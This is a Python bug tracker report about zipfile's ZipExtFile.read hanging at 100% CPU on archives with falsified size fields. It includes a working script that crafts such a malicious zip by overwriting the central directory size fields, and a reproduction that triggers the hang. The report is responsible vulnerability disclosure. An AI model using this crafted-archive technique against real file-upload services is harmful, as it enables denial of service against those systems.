New submission from Nandiya:

I am using the zipfile module on a web server that provides a service
processing files inside zips uploaded by users. While hardening it against zip
bombs, I tried binary-editing a zip to insert false file size information. The
result is interesting: with a ZIP_STORED file, or with a carefully crafted
ZIP_DEFLATED file (and perhaps ZIP_BZIP2 and ZIP_LZMA for craftier attackers
than me), when the stated file size exceeds the size of the archive itself,
ZipExtFile.read goes into an infinite loop, consuming 100% CPU.
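
For illustration, a minimal sketch of the idea (this is not the attached
malzip.py, and it assumes zipfile trusts the sizes stored in the central
directory entry): write a normal ZIP_STORED archive, then overwrite the size
fields in its central directory with a value far larger than the archive.

import struct
import zipfile

# Write a small, perfectly ordinary ZIP_STORED archive.
with zipfile.ZipFile('normal.zip', 'w', zipfile.ZIP_STORED) as zf:
    zf.writestr('payload.txt', b'hello')

with open('normal.zip', 'rb') as f:
    data = bytearray(f.read())

# Find the central directory file header (signature PK\x01\x02) and overwrite
# its compressed-size (offset 20) and uncompressed-size (offset 24) fields
# with a value far larger than the whole archive.
cd = data.index(b'PK\x01\x02')
huge = struct.pack('<I', 0x7fffffff)
data[cd + 20:cd + 24] = huge   # compressed size
data[cd + 24:cd + 28] = huge   # uncompressed size

with open('malicious.zip', 'wb') as f:
    f.write(bytes(data))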

The following methods on such an archive all result in an infinite loop:
ZipExtFile.read
ZipExtFile.read(n)
ZipExtFile.readlines
ZipFile.extract
ZipFile.extractall


ZipExtFile.read1 silently returns corrupt data but does not hang.
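
A minimal reproduction along those lines, assuming 'malicious.zip' was
produced as in the sketch above:

import zipfile

with zipfile.ZipFile('malicious.zip') as zf:
    name = zf.namelist()[0]

    with zf.open(name) as fp:
        fp.read1(100)      # returns corrupt/short data, but does not hang

    with zf.open(name) as fp:
        fp.read()          # spins at 100% CPU and never returns

    # zf.extract(name) and zf.extractall() hang the same way.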

Obviously the module doesn't need to bend over backwards to deal gracefully
with deliberately and maliciously crafted input, since the best such a user can
hope for is to bring the program crashing down, but a 100% CPU infinite loop is
probably one of the less satisfactory failure modes. It should either raise an
exception or behave like read1 and silently return corrupt data.

This is low priority except as a security issue: unless a zip is maliciously
crafted, a decompression error or invalid-zip error will almost certainly
raise an exception first.

----------
components: IO, Library (Lib)
files: malzip.py
messages: 206978
nosy: nandiya
priority: normal
severity: normal
status: open
title: zipfile - ZipExtFile.read goes into 100% CPU infinite loop on maliciously binary edited zips
type: security
versions: Python 2.7, Python 3.3
Added file: http://bugs.python.org/file33277/malzip.py

_______________________________________
Python tracker <rep...@bugs.python.org>
<http://bugs.python.org/issue20078>
_______________________________________